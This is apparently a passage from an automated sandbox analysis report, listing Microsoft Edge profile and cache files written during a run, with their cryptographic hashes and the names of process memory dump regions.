| MD5 | dfd0359c30f816839d957717060e5786 |
| SHA1 | 705b13e1554f595e9bec56722ca11aeacdbf20ae |
| SHA256 | e03da3c0305459fde6e06fc39c27ebfa4787367675e3dbe29145318c3ff6ffd7 |
| SHA512 | 99544035c0c279919c3a1ad437eaf5b067caff7aa8a4e686d00685e0ae7aa9c8db6831cf2a3c56a1e8071f2cae10c34cbb14a8d50e38ada76053fe184d7fb2cd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 968b7dd9d0e0abcfeefafded59e58d43 |
| SHA1 | 38f6aef3214c5a0f6bbb86d9fd8dd183367db328 |
| SHA256 | befc2deb93b60f43805b3a6c3d8a0f336ecdabac4f2b6ce941538536caa0e46b |
| SHA512 | e4e8ad66e3eb14db6738e4af853409b766dab9f298e94feec521e33a4b0894739e2e17122df9ccd029818bee613f68107582fc06db967db1cda06988534fb296 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5a1f1cf0af690579672a0e8b6bca2ae6 |
| SHA1 | d59dab1e21eaeda20c1d8bcf8649dc7804907337 |
| SHA256 | 7c0e1b5aef93809f84cddc39dd4e7c58049c3afbbbe7f4ad04745121ecc23377 |
| SHA512 | 8a425d81df546b4ba74620b8acbd3b40ff7a15c5437519c3f55ba4fe46acacfb21faa08fc0d6879d8d9f3e5ba8dcd5cbceacbe593469aa127c35beffa98132d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | 8e353873966596886e6121269e89addb |
| SHA1 | 11e16c4a0a6bd0ce10366b63b75742b7b90fdf99 |
| SHA256 | 1a0aea84450e8c544a707e5697cd1030ffa6a5cb0435b5f8a2623cc9c1ebe9cf |
| SHA512 | 3ea04d2a0651349b49795d1812b09813673652537bd636b0c451363eba37a29631b0c83bef20e2e0c057bb54e858f3e46f6cdf39d5bf05f75144e763d439ce49 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | 211f6bb41a59b5bfc19fbef12b91f1e0 |
| SHA1 | 4897dc9f0e291b5fcbc2fa5d138fb8b93d8158d5 |
| SHA256 | 77ee14e5dbbfc37e72b3f756eeb4ebd138197079ac57316f1cf4f382fc83deec |
| SHA512 | b5393812111658bf26b1aff1f5bd476e054420133ccc7fead1e4b1d96bc44bc3fbe74752a52386515df86ebaee269c99c855168636c932f5eb6ab86bc816a5e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | 87e8230a9ca3f0c5ccfa56f70276e2f2 |
| SHA1 | eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7 |
| SHA256 | e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9 |
| SHA512 | 37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2be8d8273b4530e9290e5d282bac14a4 |
| SHA1 | 22aff2c86c21bed76dead8388106ff627f8cb9c5 |
| SHA256 | ded13d407faf46bbe33f4e8679ab531b9209049adf675164174849eaacd41643 |
| SHA512 | 6e0fd100ffee542ef8903f34e33905e192b80d6f4f9238a7192c78887f576d3e8578d5919dfe45d52e14a65d79d4473e39a9ede076a1c2a88dad2d22c619e199 |
memory/3612-2094-0x00000000008D0000-0x00000000008E6000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a48a50713f6f5d187523d5902c8b781c |
| SHA1 | 548fcfc37de46d2dc6cb001b56d72cb2c2102dbc |
| SHA256 | 4a0b28625e9e37314925f2ce52c93dfe16f5d256e8e038af995a4b2b94845b0c |
| SHA512 | fb72fac6711514fd482d11c7c1bbd78addfa9bff3ab5475d15cfb5f2249d7df5a2620f31354d0d515900d3c86e6a1d91fbc2b1e60394241bbfdee06dd571b2b5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 0f69e386d60a9e676808642dd59191a7 |
| SHA1 | b2b3daf63ef20b6fe0218ea70ea8bd819757db6c |
| SHA256 | 5549c1d0abc12f5434e54e21aa5149580989aee335d9257339157ab07bb84857 |
| SHA512 | 14e39331e87c065e1dfec65a41721c8bc279a490618e45afdf0c1512af5a7fdb65fd843babf1744971a7a30afea6f852335ef6162c1aba922377f06adaef1c31 |
memory/2652-2146-0x000001996B0E0000-0x000001996B100000-memory.dmp
memory/2652-2147-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2148-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2149-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 01bf27372f2e7b1fe5faffc3a05166e1 |
| SHA1 | d83ce3751b2f297d798dc74fa187eda36d692670 |
| SHA256 | 2c31e1cc8033e5d1b9f3d41e7bca7d57cac3f8df5bb59be9cb23d7f35c4ef5cb |
| SHA512 | 99a8fb9cef09b4626e8b27749a0423263a80783850c4622960a858580fdc9df05a9ea38b7e4d61454a979c6f534fa7cc769627fe5cad901e217e1d28e2af0847 |
memory/2652-2159-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2160-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2161-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2162-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2163-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2164-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2165-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2166-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2167-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2168-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2169-0x00007FF65A900000-0x00007FF65B403000-memory.dmp
memory/2652-2170-0x00007FF65A900000-0x00007FF65B403000-memory.dmp